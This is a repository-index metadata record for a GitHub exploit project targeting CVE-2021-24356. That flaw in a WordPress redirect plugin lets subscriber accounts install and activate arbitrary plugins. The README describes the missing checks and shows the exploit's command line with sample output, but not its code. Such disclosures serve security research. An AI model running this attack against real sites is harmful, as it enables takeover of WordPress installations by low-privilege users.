{"id":21125733,"url":"https://github.com/randomrobbiebf/cve-2021-24356","last_synced_at":"2026-04-28T09:05:49.506Z","repository":{"id":187300371,"uuid":"676669833","full_name":"RandomRobbieBF/CVE-2021-24356","owner":"RandomRobbieBF","description":"Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation","archived":false,"fork":false,"pushed_at":"2023-08-09T18:26:57.000Z","size":17,"stargazers_count":0,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-01-01T05:47:31.906Z","etag":null,"topics":["cve-2021-24356","wordpress-exploit","wordpress-plugin"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-08-09T18:24:19.000Z","updated_at":"2024-08-12T20:32:24.000Z","dependencies_parsed_at":null,"dependency_job_id":"42d173c3-d434-48d8-a932-3009571be9ed","html_url":"https://github.com/RandomRobbieBF/CVE-2021-24356","commit_stats":null,"previous_names":["randomrobbiebf/cve-2021-24356"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2021-24356","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2021-24356/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32373551,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-27T20:07:02.737Z","status":"online","status_checked_at":"2026-04-28T02:00:07.250Z","response_time":56,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-24356","wordpress-exploit","wordpress-plugin"],"created_at":"2024-11-20T04:36:38.350Z","updated_at":"2026-04-28T09:05:49.478Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2021-24356\nSimple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation\n\n# Description\nA lack of capability checks and insufficient nonce check on the AJAX action in the plugin, made it possible for authenticated users to install arbitrary plugins on vulnerable sites. \n\nHow to use\n----\n\n```\n$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks\nGetting REST API Nonce!\nNonce Found: dd72f43027\nInstalling Plugin!\n{\"success\":true,\"data\":\"Plugin is installed successfully!\"}\nActivating Plugin!\n{\"success\":true,\"data\":\"BetterLinks is activated!\"}\n```\n\nNote: Some plugins might not activate if not you need to change sluga variable to the path/file.php that is the main file for the plugin currently works really well when the slug is something like betterlinks and the main file of the plugin is called betterlinks.php\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2021-24356","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2021-24356","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2021-24356/lists"}